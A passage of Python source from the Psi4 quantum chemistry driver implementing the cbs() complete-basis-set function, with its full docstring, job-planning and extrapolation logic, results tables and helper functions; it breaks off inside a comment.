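#          {"wfn": "ccsd(t)", "basis": "cc-pvdz"}]
# before _validate_cbs_inputs prepends the implied hf reference stage.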
###################################
## Start of Complete Basis Set ##
###################################
def cbs(func, label, **kwargs):
r"""Function to define a multistage energy method from combinations of
basis set extrapolations and delta corrections and condense the
components into a minimum number of calculations.
:aliases: complete_basis_set()
:returns: (*float*) -- Total electronic energy in Hartrees
:PSI variables:
.. hlist::
:columns: 1
* :psivar:`CBS TOTAL ENERGY`
* :psivar:`CBS REFERENCE ENERGY`
* :psivar:`CBS CORRELATION ENERGY`
* :psivar:`CURRENT ENERGY`
* :psivar:`CURRENT REFERENCE ENERGY`
* :psivar:`CURRENT CORRELATION ENERGY`
.. caution:: Some features are not yet implemented. Buy a developer a coffee.
- No way to tell function to boost fitting basis size for all calculations.
- Need to add more extrapolation schemes
As represented in the equation below, a CBS energy method is defined in several
sequential stages (scf, corl, delta1, delta2, ... ) covering treatment
of the reference total energy, the correlation energy, a delta correction to the
correlation energy, and a second delta correction, etc.. Each is activated by its
stage_wfn keyword, or as a field in the ```cbs_metadata``` list, and is only
allowed if all preceding stages are active.
.. include:: /cbs_eqn.rst
* Energy Methods
The presence of a stage_wfn keyword is the indicator to incorporate
(and check for stage_basis and stage_scheme keywords) and compute
that stage in defining the CBS energy.
The cbs() function requires, at a minimum, ``name='scf'`` and ``scf_basis``
keywords to be specified for reference-step only jobs and ``name`` and
``corl_basis`` keywords for correlated jobs.
The following energy methods have been set up for cbs().
.. hlist::
:columns: 5
* scf
* hf
* mp2
* mp2.5
* mp3
* mp4(sdq)
* mp4
* mp\ *n*
* omp2
* omp2.5
* omp3
* olccd
* lccd
* lccsd
* cepa(0)
* cepa(1)
* cepa(3)
* acpf
* aqcc
* qcisd
* cc2
* ccsd
* fno-ccsd
* bccd
* cc3
* qcisd(t)
* ccsd(t)
* fno-ccsd(t)
* bccd(t)
* cisd
* cisdt
* cisdtq
* ci\ *n*
* fci
* mrccsd
* mrccsd(t)
* mrccsdt
* mrccsdt(q)
:type name: str
:param name: ``'scf'`` || ``'ccsd'`` || etc.
First argument, usually unlabeled. Indicates the computational method
for the correlation energy, unless only reference step to be performed,
in which case should be ``'scf'``. Overruled if stage_wfn keywords supplied.
:type scf_wfn: str
:param scf_wfn: |dl| ``'scf'`` |dr| || ``'c4-scf'`` || etc.
Indicates the energy method for which the reference energy is to be
obtained. Generally unnecessary, as 'scf' is *the* scf in |PSIfour| but
can be used to direct lone scf components to run in |PSIfour| or Cfour
in a mixed-program composite method.
:type corl_wfn: str
:param corl_wfn: ``'mp2'`` || ``'ccsd(t)'`` || etc.
Indicates the energy method for which the correlation energy is to be
obtained. Can also be specified with ``name`` or as the unlabeled
first argument to the function.
:type delta_wfn: str
:param delta_wfn: ``'ccsd'`` || ``'ccsd(t)'`` || etc.
Indicates the (superior) energy method for which a delta correction
to the correlation energy is to be obtained.
:type delta_wfn_lesser: str
:param delta_wfn_lesser: |dl| ``corl_wfn`` |dr| || ``'mp2'`` || etc.
Indicates the inferior energy method for which a delta correction
to the correlation energy is to be obtained.
:type delta2_wfn: str
:param delta2_wfn: ``'ccsd'`` || ``'ccsd(t)'`` || etc.
Indicates the (superior) energy method for which a second delta correction
to the correlation energy is to be obtained.
:type delta2_wfn_lesser: str
:param delta2_wfn_lesser: |dl| ``delta_wfn`` |dr| || ``'ccsd(t)'`` || etc.
Indicates the inferior energy method for which a second delta correction
to the correlation energy is to be obtained.
* Basis Sets
Currently, basis sets set through ``set`` commands have no influence
on a cbs calculation.
:type scf_basis: :ref:`basis string <apdx:basisElement>`
:param scf_basis: |dl| ``corl_basis`` |dr| || ``'cc-pV[TQ]Z'`` || ``'jun-cc-pv[tq5]z'`` || ``'6-31G*'`` || etc.
Indicates the sequence of basis sets employed for the reference energy.
If any correlation method is specified, ``scf_basis`` can default
to ``corl_basis``.
:type corl_basis: :ref:`basis string <apdx:basisElement>`
:param corl_basis: ``'cc-pV[TQ]Z'`` || ``'jun-cc-pv[tq5]z'`` || ``'6-31G*'`` || etc.
Indicates the sequence of basis sets employed for the correlation energy.
:type delta_basis: :ref:`basis string <apdx:basisElement>`
:param delta_basis: ``'cc-pV[TQ]Z'`` || ``'jun-cc-pv[tq5]z'`` || ``'6-31G*'`` || etc.
Indicates the sequence of basis sets employed for the delta correction
to the correlation energy.
:type delta2_basis: :ref:`basis string <apdx:basisElement>`
:param delta2_basis: ``'cc-pV[TQ]Z'`` || ``'jun-cc-pv[tq5]z'`` || ``'6-31G*'`` || etc.
Indicates the sequence of basis sets employed for the second delta correction
to the correlation energy.
* Schemes
Transformations of the energy through basis set extrapolation for each
stage of the CBS definition. A complaint is generated if the number of basis
sets in stage_basis does not exactly satisfy the requirements of stage_scheme.
An exception is the default, ``'xtpl_highest_1'``, which uses the best basis
set available. See :ref:`sec:cbs_xtpl` for all available schemes.
:type scf_scheme: Callable
:param scf_scheme: |dl| ``xtpl_highest_1`` |dr| || ``scf_xtpl_helgaker_3`` || etc.
Indicates the basis set extrapolation scheme to be applied to the reference energy.
Defaults to :py:func:`~psi4.driver.driver_cbs.scf_xtpl_helgaker_3` if three valid basis sets
present in ``psi4.driver.driver_cbs.scf_basis``, :py:func:`~psi4.driver.driver_cbs.scf_xtpl_helgaker_2` if two valid basis
sets present in ``scf_basis``, and :py:func:`~psi4.driver.driver_cbs.xtpl_highest_1` otherwise.
.. hlist::
:columns: 1
* :py:func:`~psi4.driver.driver_cbs.xtpl_highest_1`
* :py:func:`~psi4.driver.driver_cbs.scf_xtpl_helgaker_3`
* :py:func:`~psi4.driver.driver_cbs.scf_xtpl_helgaker_2`
* :py:func:`~psi4.driver.driver_cbs.scf_xtpl_truhlar_2`
* :py:func:`~psi4.driver.driver_cbs.scf_xtpl_karton_2`
:type corl_scheme: Callable
:param corl_scheme: |dl| ``xtpl_highest_1`` |dr| || ``corl_xtpl_helgaker_2`` || etc.
Indicates the basis set extrapolation scheme to be applied to the correlation energy.
Defaults to :py:func:`~psi4.driver.driver_cbs.corl_xtpl_helgaker_2` if two valid basis sets
present in ``corl_basis`` and :py:func:`~psi4.driver.driver_cbs.xtpl_highest_1` otherwise.
.. hlist::
:columns: 1
* :py:func:`~psi4.driver.driver_cbs.xtpl_highest_1`
* :py:func:`~psi4.driver.driver_cbs.corl_xtpl_helgaker_2`
:type delta_scheme: Callable
:param delta_scheme: |dl| ``xtpl_highest_1`` |dr| || ``corl_xtpl_helgaker_2`` || etc.
Indicates the basis set extrapolation scheme to be applied to the delta correction
to the correlation energy.
Defaults to :py:func:`~psi4.driver.driver_cbs.corl_xtpl_helgaker_2` if two valid basis sets
present in ``delta_basis`` and :py:func:`~psi4.driver.driver_cbs.xtpl_highest_1` otherwise.
.. hlist::
:columns: 1
* :py:func:`~psi4.driver.driver_cbs.xtpl_highest_1`
* :py:func:`~psi4.driver.driver_cbs.corl_xtpl_helgaker_2`
:type delta2_scheme: Callable
:param delta2_scheme: |dl| ``xtpl_highest_1`` |dr| || ``corl_xtpl_helgaker_2`` || etc.
Indicates the basis set extrapolation scheme to be applied to the second delta correction
to the correlation energy.
Defaults to :py:func:`~psi4.driver.driver_cbs.corl_xtpl_helgaker_2` if two valid basis sets
present in ``delta2_basis`` and :py:func:`~psi4.driver.driver_cbs.xtpl_highest_1` otherwise.
.. hlist::
:columns: 1
* :py:func:`~psi4.driver.driver_cbs.xtpl_highest_1`
* :py:func:`~psi4.driver.driver_cbs.corl_xtpl_helgaker_2`
:type scf_alpha: float
:param scf_alpha: |dl| ``1.63`` |dr|
Overrides the default \alpha parameter used in the listed SCF extrapolation procedures.
Has no effect on others, including :py:func:`~psi4.driver.driver_cbs.xtpl_highest_1` and :py:func:`~psi4.driver.driver_cbs.scf_xtpl_helgaker_3`.
.. hlist::
:columns: 1
* :py:func:`~psi4.driver.driver_cbs.scf_xtpl_helgaker_2`
* :py:func:`~psi4.driver.driver_cbs.scf_xtpl_truhlar_2`
* :py:func:`~psi4.driver.driver_cbs.scf_xtpl_karton_2`
:type corl_alpha: float
:param corl_alpha: |dl| ``3.00`` |dr|
Overrides the default \alpha parameter used in the listed :py:func:`~psi4.driver.driver_cbs.corl_xtpl_helgaker_2` correlation
extrapolation to the corl stage. The supplied \alpha does not impact delta or any further stages.
.. hlist::
:columns: 1
* :py:func:`~psi4.driver.driver_cbs.corl_xtpl_helgaker_2`
:type delta_alpha: float
:param delta_alpha: |dl| ``3.00`` |dr|
Overrides the default \alpha parameter used in the listed
:py:func:`~psi4.driver.driver_cbs.corl_xtpl_helgaker_2` correlation extrapolation for the delta correction. Useful when
delta correction is performed using smaller basis sets for which a different \alpha might
be more appropriate.
.. hlist::
:columns: 1
* :py:func:`~psi4.driver.driver_cbs.corl_xtpl_helgaker_2`
* Combined interface
:type cbs_metadata: List[Dict]
:param cbs_metadata: |dl| autogenerated from above keywords |dr| || ``[{"wfn": "hf", "basis": "cc-pv[TQ5]z"}]`` || etc.
This is the interface to which all of the above calls are internally translated. The first item in
the array is always defining the SCF contribution to the total energy. The required items in the
dictionary are:
* ```wfn```: typically ```HF```, which is subsumed in correlated methods anyway.
* ```basis```: basis set, can be in a bracketed form (eg. ```cc-pv[tq]z```)
| Other supported arguments for the first dictionary are:
* ```scheme```: scf extrapolation scheme function, by default it is worked out from the number of basis sets (1 - 3) supplied as ```basis```.
* ```alpha```: alpha for the above scheme, if the default is to be overridden
* ```options```: if special options are required for a step, they should be entered as a dict here. If some options should be used for both parts of the stage, they should be entered in both ```options``` and ```options_lo```. This is helpful for calculating all-electron corrections in otherwise frozen-core calculations, or relativistic (DKH) Hamiltonian corrections for an otherwise nonrelativistic calculation.
* ```options_lo```: special options for lower method in a given stage. This is useful to calculate a direct stage in an otherwise density-fitted calculation, or similar.
* ```treatment```: treat extrapolation stage as ```scf``` or ```corl```, by default only the first stage is ```scf``` and every later one is ```corl```.
* ```stage```: tag for the stage used in tables.
| The next items in the ```cbs_metadata``` array extrapolate correlation. All of the above parameters are available, with only the ```wfn``` and ```basis``` keywords required. Other supported parameters are:
* ```wfn_lo```: the lower method from which the delta correction is to be calculated. By default, it is set to ```wfn``` from the previous field in the ```cbs_metadata``` array.
* ```basis_lo```: basis set to be used for the delta correction. By default, it is the same as the ```basis``` specified above.
* Others
:type molecule: :ref:`molecule <op_py_molecule>`
:param molecule: ``h2o`` || etc.
The target molecule, if not the last molecule defined.
:examples:
>>> # [1] replicates with cbs() the simple model chemistry scf/cc-pVDZ: set basis cc-pVDZ energy('scf')
>>> energy(cbs, scf_wfn='scf', scf_basis='cc-pVDZ')
>>> # [2] replicates with cbs() the simple model chemistry mp2/jun-cc-pVDZ: set basis jun-cc-pVDZ energy('mp2')
>>> energy(cbs, corl_wfn='mp2', corl_basis='jun-cc-pVDZ')
>>> # [3] DTQ-zeta extrapolated scf reference energy
>>> energy(cbs, scf_wfn='scf', scf_basis='cc-pV[DTQ]Z', scf_scheme=scf_xtpl_helgaker_3)
>>> # [4] DT-zeta extrapolated mp2 correlation energy atop a T-zeta reference
>>> energy(cbs, corl_wfn='mp2', corl_basis='cc-pv[dt]z', corl_scheme=corl_xtpl_helgaker_2)
>>> # [5] a DT-zeta extrapolated coupled-cluster correction atop a TQ-zeta extrapolated mp2 correlation energy atop a Q-zeta reference (both equivalent)
>>> energy(cbs, corl_wfn='mp2', corl_basis='aug-cc-pv[tq]z', delta_wfn='ccsd(t)', delta_basis='aug-cc-pv[dt]z')
>>> energy(cbs, corl_wfn='mp2', corl_basis='aug-cc-pv[tq]z', corl_scheme=corl_xtpl_helgaker_2, delta_wfn='ccsd(t)', delta_basis='aug-cc-pv[dt]z', delta_scheme=corl_xtpl_helgaker_2)
>>> # [6] a D-zeta ccsd(t) correction atop a DT-zeta extrapolated ccsd cluster correction atop a TQ-zeta extrapolated mp2 correlation energy atop a Q-zeta reference
>>> energy(cbs, corl_wfn='mp2', corl_basis='aug-cc-pv[tq]z', corl_scheme=corl_xtpl_helgaker_2, delta_wfn='ccsd', delta_basis='aug-cc-pv[dt]z', delta_scheme=corl_xtpl_helgaker_2, delta2_wfn='ccsd(t)', delta2_wfn_lesser='ccsd', delta2_basis='aug-cc-pvdz')
>>> # [7] a Q5-zeta MP2 calculation, corrected by CCSD(T) at the TQ-zeta extrapolated level, and all-electron CCSD(T) correlation at T-zeta level
>>> energy(cbs, cbs_metadata=[{"wfn": "hf", "basis": "cc-pv5z"}, {"wfn": "mp2", "basis": "cc-pv[q5]z"}, {"wfn": "ccsd(t)", "basis": "cc-pv[tq]z"}, {"wfn": "ccsd(t)", "basis": "cc-pvtz", "options": {"freeze_core": "False"}}])
>>> # [8] cbs() coupled with database()
>>> TODO database('mp2', 'BASIC', subset=['h2o','nh3'], symm='on', func=cbs, corl_basis='cc-pV[tq]z', corl_scheme=corl_xtpl_helgaker_2, delta_wfn='ccsd(t)', delta_basis='sto-3g')
>>> # [9] cbs() coupled with optimize()
>>> TODO optimize('mp2', corl_basis='cc-pV[DT]Z', corl_scheme=corl_xtpl_helgaker_2, func=cbs)
"""
kwargs = p4util.kwargs_lower(kwargs)
metadata = _process_cbs_kwargs(kwargs)
return_wfn = kwargs.pop('return_wfn', False)
verbose = kwargs.pop('verbose', 0)
ptype = kwargs.pop('ptype')
if ptype not in ['energy', 'gradient', 'hessian']:
raise ValidationError("""Wrapper complete_basis_set is unhappy to be calling
function '%s' instead of 'energy', 'gradient' or 'hessian'.""" % ptype)
optstash = p4util.OptionsState(['BASIS'], ['WFN'], ['WRITER_FILE_LABEL'])
# Define some quantum chemical knowledge, namely what methods are subsumed in others
user_writer_file_label = core.get_global_option('WRITER_FILE_LABEL')
# Make sure the molecule the user provided is the active one
molecule = kwargs.pop('molecule', core.get_active_molecule())
molecule.update_geometry()
natom = molecule.natom()
if metadata[0]["wfn"] not in VARH.keys():
raise ValidationError(
"""Requested SCF method '%s' is not recognized. Add it to VARH in wrapper.py to proceed.""" %
(metadata[0]["wfn"]))
if len(metadata) > 1:
for delta in metadata[1:]:
if delta["wfn"] not in VARH.keys():
raise ValidationError(
"""Requested higher %s method '%s' is not recognized. Add it to VARH in wrapper.py to proceed.""" %
(delta["treatment"], delta["wfn"]))
if delta["wfn_lo"] not in VARH.keys():
raise ValidationError(
"""Requested lesser %s method '%s' is not recognized. Add it to VARH in wrapper.py to proceed.""" %
(delta["treatment"], delta["wfn_lo"]))
# Build string of title banner
instructions = "\n" + p4util.banner(f" CBS Setup{':' + label if label else ''} ", strNotOutfile=True) + "\n"
core.print_out(instructions)
# Call schemes for each portion of total energy to 'place orders' for calculations needed
d_fields = [
'd_stage', 'd_scheme', 'd_basis', 'd_wfn', 'd_need', 'd_coef', 'd_energy', 'd_gradient', 'd_hessian', 'd_alpha'
]
f_fields = ['f_wfn', 'f_basis', 'f_zeta', 'f_energy', 'f_gradient', 'f_hessian', 'f_options']
GRAND_NEED = []
MODELCHEM = []
NEED = _expand_scheme_orders(metadata[0]["scheme"], metadata[0]["basis"][0], metadata[0]["basis"][1],
metadata[0]["wfn"], metadata[0]["options"], natom)
GRAND_NEED.append(
dict(
zip(d_fields, [
'scf', metadata[0]["scheme"],
_contract_bracketed_basis(metadata[0]["basis"][0]), metadata[0]["wfn"], NEED, +1, 0.0, None, None,
metadata[0]["alpha"]
])))
if len(metadata) > 1:
for delta in metadata[1:]:
NEED = _expand_scheme_orders(delta["scheme"], delta["basis"][0], delta["basis"][1], delta["wfn"],
delta["options"], natom)
GRAND_NEED.append(
dict(
zip(d_fields, [
delta["stage"], delta["scheme"],
_contract_bracketed_basis(delta["basis"][0]), delta["wfn"], NEED, +1, 0.0, None, None,
delta["alpha"]
])))
NEED = _expand_scheme_orders(delta["scheme"], delta["basis_lo"][0], delta["basis_lo"][1], delta["wfn_lo"],
delta["options_lo"], natom)
GRAND_NEED.append(
dict(
zip(d_fields, [
delta["stage"], delta["scheme"],
_contract_bracketed_basis(delta["basis_lo"][0]), delta["wfn_lo"], NEED, -1, 0.0, None, None,
delta["alpha"]
])))
for stage in GRAND_NEED:
for lvl in stage['d_need'].items():
MODELCHEM.append(lvl[1])
# Apply chemical reasoning to choose the minimum computations to run
JOBS = MODELCHEM[:]
addlremark = {'energy': '', 'gradient': ', GRADIENT', 'hessian': ', HESSIAN'}
instructions = ''
instructions += """ Naive listing of computations required.\n"""
for mc in JOBS:
instructions += """ %12s / %-24s for %s%s\n""" % \
(mc['f_wfn'], mc['f_basis'] + " + options"*bool(mc['f_options']),
VARH[mc['f_wfn']][mc['f_wfn']], addlremark[ptype])
# Remove duplicate modelchem portion listings
for mc in MODELCHEM:
dups = -1
for indx_job, job in enumerate(JOBS):
if (job['f_wfn'] == mc['f_wfn']) and (job['f_basis'] == mc['f_basis']) and \
(job['f_options'] == mc['f_options']):
dups += 1
if dups >= 1:
del JOBS[indx_job]
# Remove chemically subsumed modelchem portion listings
if ptype == 'energy':
for mc in MODELCHEM:
for wfn in VARH[mc['f_wfn']]:
for indx_job, job in enumerate(JOBS):
if (VARH[mc['f_wfn']][wfn] == VARH[job['f_wfn']][job['f_wfn']]) and \
(mc['f_basis'] == job['f_basis']) and not \
(mc['f_wfn'] == job['f_wfn']) and \
(mc['f_options'] == False):
del JOBS[indx_job]
instructions += """\n Enlightened listing of computations required.\n"""
for mc in JOBS:
instructions += """ %12s / %-24s for %s%s\n""" % \
(mc['f_wfn'], mc['f_basis'] + " + options"*bool(mc['f_options']),
VARH[mc['f_wfn']][mc['f_wfn']], addlremark[ptype])
# Expand listings to all that will be obtained
JOBS_EXT = []
for job in JOBS:
for wfn in VARH[job['f_wfn']]:
JOBS_EXT.append(
dict(
zip(f_fields, [
wfn, job['f_basis'], job['f_zeta'], 0.0,
core.Matrix(natom, 3),
core.Matrix(3 * natom, 3 * natom), job['f_options']
])))
instructions += """\n Full listing of computations to be obtained (required and bonus).\n"""
for mc in JOBS_EXT:
instructions += """ %12s / %-24s for %s%s\n""" % \
(mc['f_wfn'], mc['f_basis'] + " + options"*bool(mc['f_options']),
VARH[mc['f_wfn']][mc['f_wfn']], addlremark[ptype])
core.print_out(instructions)
psioh = core.IOManager.shared_object()
psioh.set_specific_retention(psif.PSIF_SCF_MOS, True)
# MO-guess projection across point groups is not allowed, and cbs() is usually a mix of
# symmetry-enabled and symmetry-tolerant calls; GUESS_PERSIST must be communicated
# to optimize(), so it is reset by that function's optstash rather than here.
core.set_local_option('SCF', 'GUESS_PERSIST', True)
Njobs = 0
# Run necessary computations
for mc in JOBS:
kwargs['name'] = mc['f_wfn']
# Build string of title banner
cbsbanners = ''
cbsbanners += """core.print_out('\\n')\n"""
cbsbanners += """p4util.banner(' CBS Computation: %s / %s%s ')\n""" % \
(mc['f_wfn'].upper(), mc['f_basis'].upper() + " + opts."*bool(mc['f_options']), addlremark[ptype])
cbsbanners += """core.print_out('\\n')\n\n"""
exec(cbsbanners)
# Build string of molecule and commands that are dependent on the database
commands = '\n'
commands += """\ncore.set_global_option('BASIS', '%s')\n""" % (mc['f_basis'])
commands += """core.set_global_option('WRITER_FILE_LABEL', '%s')\n""" % \
(user_writer_file_label + ('' if user_writer_file_label == '' else '-') + mc['f_wfn'].lower() + '-' + mc['f_basis'].lower().replace('*', 's'))
exec(commands)
# Stash and set options if any
if mc["f_options"]:
optionstash = p4util.OptionsState(*[[opt] for opt in list(mc["f_options"])])
for k, v, in mc["f_options"].items():
core.set_global_option(k.upper(), v)
else:
optionstash = False
# Make energy(), etc. call
response = func(molecule=molecule, **kwargs)
if ptype == 'energy':
mc['f_energy'] = response
elif ptype == 'gradient':
mc['f_gradient'] = response
mc['f_energy'] = core.variable('CURRENT ENERGY')
if verbose > 1:
mc['f_gradient'].print_out()
elif ptype == 'hessian':
mc['f_hessian'] = response
mc['f_energy'] = core.variable('CURRENT ENERGY')
if verbose > 1:
mc['f_hessian'].print_out()
Njobs += 1
if verbose > 1:
core.print_out("\nCURRENT ENERGY: %14.16f\n" % mc['f_energy'])
# Restore modified options
if optionstash:
optionstash.restore()
# Fill in energies for subsumed methods
if ptype == 'energy':
for wfn in VARH[mc['f_wfn']]:
for job in JOBS_EXT:
if (wfn == job['f_wfn']) and (mc['f_basis'] == job['f_basis']) and \
(mc['f_options'] == job['f_options']):
job['f_energy'] = core.variable(VARH[wfn][wfn])
if verbose > 1:
core.print_variables()
core.clean_variables()
core.clean()
# Copy data from 'run' to 'obtained' table
for mce in JOBS_EXT:
if (mc['f_wfn'] == mce['f_wfn']) and (mc['f_basis'] == mce['f_basis']) and \
(mc['f_options'] == mce['f_options']):
mce['f_energy'] = mc['f_energy']
mce['f_gradient'] = mc['f_gradient']
mce['f_hessian'] = mc['f_hessian']
psioh.set_specific_retention(psif.PSIF_SCF_MOS, False)
# Build string of title banner
instructions = "\n" + p4util.banner(f" CBS Results{':' + label if label else ''} ", strNotOutfile=True) + "\n"
core.print_out(instructions)
# Insert obtained energies into the array that stores the cbs stages
for stage in GRAND_NEED:
for lvl in stage['d_need'].items():
MODELCHEM.append(lvl[1])
for job in JOBS_EXT:
# Don't ask: match method names across the optional Cfour 'c4-' prefix
if (((lvl[1]['f_wfn'] == job['f_wfn']) or
((lvl[1]['f_wfn'][3:] == job['f_wfn']) and lvl[1]['f_wfn'].startswith('c4-')) or
((lvl[1]['f_wfn'] == job['f_wfn'][3:]) and job['f_wfn'].startswith('c4-')) or
(('c4-' + lvl[1]['f_wfn']) == job['f_wfn']) or (lvl[1]['f_wfn'] == ('c4-' + job['f_wfn'])))
and (lvl[1]['f_basis'] == job['f_basis']) and (lvl[1]['f_options'] == job['f_options'])):
lvl[1]['f_energy'] = job['f_energy']
lvl[1]['f_gradient'] = job['f_gradient']
lvl[1]['f_hessian'] = job['f_hessian']
# Make xtpl() call
finalenergy = 0.0
finalgradient = core.Matrix(natom, 3)
finalhessian = core.Matrix(3 * natom, 3 * natom)
for stage in GRAND_NEED:
hiloargs = {'alpha': stage['d_alpha']}
hiloargs.update(_contract_scheme_orders(stage['d_need'], 'f_energy'))
stage['d_energy'] = stage['d_scheme'](**hiloargs)
finalenergy += stage['d_energy'] * stage['d_coef']
if ptype == 'gradient':
hiloargs.update(_contract_scheme_orders(stage['d_need'], 'f_gradient'))
stage['d_gradient'] = stage['d_scheme'](**hiloargs)
work = stage['d_gradient'].clone()
work.scale(stage['d_coef'])
finalgradient.add(work)
elif ptype == 'hessian':
hiloargs.update(_contract_scheme_orders(stage['d_need'], 'f_hessian'))
stage['d_hessian'] = stage['d_scheme'](**hiloargs)
work = stage['d_hessian'].clone()
work.scale(stage['d_coef'])
finalhessian.add(work)
# Build string of results table
table_delimit = ' ' + '-' * 105 + '\n'
tables = ''
tables += """\n ==> %s <==\n\n""" % ('Components')
tables += table_delimit
tables += """ %6s %20s %1s %-26s %3s %16s %-s\n""" % ('', 'Method', '/', 'Basis', 'Rqd', 'Energy [Eh]',
'Variable')
tables += table_delimit
for job in JOBS_EXT:
star = ''
for mc in MODELCHEM:
if (job['f_wfn'] == mc['f_wfn']) and (job['f_basis'] == mc['f_basis']):
star = '*'
tables += """ %6s %20s %1s %-27s %2s %16.8f %-s\n""" % (
'', job['f_wfn'], '/', job['f_basis'] + " + options" * bool(job['f_options']), star, job['f_energy'],
VARH[job['f_wfn']][job['f_wfn']])
tables += table_delimit
tables += """\n ==> %s <==\n\n""" % ('Stages')
tables += table_delimit
tables += """ %6s %20s %1s %-27s %2s %16s %-s\n""" % ('Stage', 'Method', '/', 'Basis', 'Wt', 'Energy [Eh]',
'Scheme')
tables += table_delimit
for stage in GRAND_NEED:
tables += """ %6s %20s %1s %-27s %2d %16.8f %-s\n""" % (stage['d_stage'], stage['d_wfn'], '/',
stage['d_basis'], stage['d_coef'],
stage['d_energy'], stage['d_scheme'].__name__)
tables += table_delimit
tables += """\n ==> %s <==\n\n""" % ('CBS')
tables += table_delimit
tables += """ %6s %20s %1s %-27s %2s %16s %-s\n""" % ('Stage', 'Method', '/', 'Basis', '', 'Energy [Eh]',
'Scheme')
tables += table_delimit
tables += """ %6s %20s %1s %-27s %2s %16.8f %-s\n""" % (
GRAND_NEED[0]['d_stage'], GRAND_NEED[0]['d_wfn'], '/', GRAND_NEED[0]['d_basis'], '', GRAND_NEED[0]['d_energy'],
GRAND_NEED[0]['d_scheme'].__name__)
if len(metadata) > 1:
tables += """ %6s %20s %1s %-27s %2s %16.8f %-s\n""" % (
GRAND_NEED[1]['d_stage'], GRAND_NEED[1]['d_wfn'], '/', GRAND_NEED[1]['d_basis'], '',
GRAND_NEED[1]['d_energy'] - GRAND_NEED[2]['d_energy'], GRAND_NEED[1]['d_scheme'].__name__)
if len(metadata) > 2:
dc = 3
for delta in metadata[2:]:
deltaE_total = GRAND_NEED[dc]['d_energy'] - GRAND_NEED[dc + 1]['d_energy']
tables += """ %6s %20s %1s %-27s %2s %16.8f %-s\n""" % (
GRAND_NEED[dc]['d_stage'], GRAND_NEED[dc]['d_wfn'] + ' - ' + GRAND_NEED[dc + 1]['d_wfn'], '/',
GRAND_NEED[dc]['d_basis'], '', deltaE_total,
GRAND_NEED[dc]['d_scheme'].__name__)
core.set_variable(f"CBS {GRAND_NEED[dc]['d_stage'].upper()} TOTAL ENERGY", deltaE_total)
dc += 2
tables += """ %6s %20s %1s %-27s %2s %16.8f %-s\n""" % ('total', 'CBS', '', '', '', finalenergy, '')
tables += table_delimit
core.print_out(tables)
core.set_variable('CBS REFERENCE ENERGY', GRAND_NEED[0]['d_energy'])
core.set_variable('CBS CORRELATION ENERGY', finalenergy - GRAND_NEED[0]['d_energy'])
core.set_variable('CBS TOTAL ENERGY', finalenergy)
core.set_variable('CURRENT REFERENCE ENERGY', GRAND_NEED[0]['d_energy'])
core.set_variable('CURRENT CORRELATION ENERGY', finalenergy - GRAND_NEED[0]['d_energy'])
core.set_variable('CURRENT ENERGY', finalenergy)
core.set_variable('CBS NUMBER', Njobs)
# new skeleton wavefunction w/mol, highest-SCF basis (just to choose one), & not energy
basis = core.BasisSet.build(molecule, "ORBITAL", 'def2-svp')
wfn = core.Wavefunction(molecule, basis)
optstash.restore()
if ptype == 'energy':
finalquantity = finalenergy
elif ptype == 'gradient':
finalquantity = finalgradient
wfn.set_gradient(finalquantity)
if finalquantity.rows(0) < 20:
core.print_out('CURRENT GRADIENT')
finalquantity.print_out()
elif ptype == 'hessian':
finalquantity = finalhessian
wfn.set_gradient(finalgradient)
wfn.set_hessian(finalquantity)
if finalquantity.rows(0) < 20:
core.print_out('CURRENT HESSIAN')
finalquantity.print_out()
if return_wfn:
return (finalquantity, wfn)
else:
return finalquantity
######### COMPUTE / ASSEMBLE
######### ASSEMBLE / REPORT
def _expand_scheme_orders(scheme, basisname, basiszeta, wfnname, options, natom):
"""Check that the length of *basiszeta* array matches the implied degree of
extrapolation in *scheme* name. Return a dictionary of same length as
basiszeta, with *basisname* and *basiszeta* distributed therein.
"""
Nxtpl = len(basiszeta)
if int(scheme.__name__.split('_')[-1]) != Nxtpl:
raise ValidationError("""Call to '%s' not valid with %d basis sets.""" % (scheme.__name__, len(basiszeta)))
f_fields = ['f_wfn', 'f_basis', 'f_zeta', 'f_energy', 'f_gradient', 'f_hessian', 'f_options']
NEED = {}
for idx in range(Nxtpl):
NEED[_lmh_labels[Nxtpl][idx]] = dict(
zip(f_fields, [
wfnname, basisname[idx], basiszeta[idx], 0.0,
core.Matrix(natom, 3),
core.Matrix(3 * natom, 3 * natom), options
]))
return NEED
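# Illustrative shape (hypothetical inputs): for a two-point extrapolation, e.g.
# scheme=corl_xtpl_helgaker_2 with wfnname='mp2', basisname=['cc-pvtz', 'cc-pvqz']
# and basiszeta=[3, 4], NEED comes back keyed by _lmh_labels[2] (i.e. 'LO'/'HI'):
#   {'LO': {'f_wfn': 'mp2', 'f_basis': 'cc-pvtz', 'f_zeta': 3, ...},
#    'HI': {'f_wfn': 'mp2', 'f_basis': 'cc-pvqz', 'f_zeta': 4, ...}}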
def _contract_scheme_orders(needdict, datakey='f_energy'):
"""Prepared named arguments for extrapolation functions by
extracting zetas and values (which one determined by *datakey*) out
of *needdict* and returning a dictionary whose keys are constructed
from _lmh_labels.
"""
largs = {}
largs['functionname'] = needdict['HI']['f_wfn']
Nxtpl = len(needdict)
zlabels = _lmh_labels[Nxtpl] # e.g., ['LO', 'HI']
for zeta in range(Nxtpl):
zlab = zlabels[zeta] # e.g., LO
largs['z' + zlab] = needdict[zlab]['f_zeta']
largs['value' + zlab] = needdict[zlab][datakey]
return largs
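# Illustrative (continuing the sketch above): for that two-entry NEED dict,
# _contract_scheme_orders(NEED) returns keyword arguments of the form
#   {'functionname': 'mp2', 'zLO': 3, 'valueLO': <energy>,
#    'zHI': 4, 'valueHI': <energy>}
# ready to be splatted into the extrapolation scheme as scheme(**largs).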
## Aliases ##
complete_basis_set = cbs
def _cbs_wrapper_methods(**kwargs):
""" A helper function for the driver to enumerate methods used in the
stages of a cbs calculation.
Parameters
----------
kwargs : dict
kwargs containing cbs specification either in the ``cbs_metadata``
format, or in separate keywords (``scf_wfn``, ``corl_wfn`` etc.).
Returns
-------
list
List containing method name for each active stage.
"""
cbs_methods = []
if "cbs_metadata" in kwargs:
for item in kwargs["cbs_metadata"]:
cbs_methods.append(item.get("wfn"))
else:
cbs_method_kwargs = ['scf_wfn', 'corl_wfn', 'delta_wfn']
cbs_method_kwargs += [f'delta{x}_wfn' for x in range(2, 6)]
for method in cbs_method_kwargs:
if method in kwargs:
cbs_methods.append(kwargs[method])
return cbs_methods
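# Illustrative (hypothetical values): with the cbs_metadata form,
#   _cbs_wrapper_methods(cbs_metadata=[{"wfn": "hf", "basis": "cc-pv5z"},
#                                      {"wfn": "mp2", "basis": "cc-pv[q5]z"}])
# returns ['hf', 'mp2']; with separate keywords,
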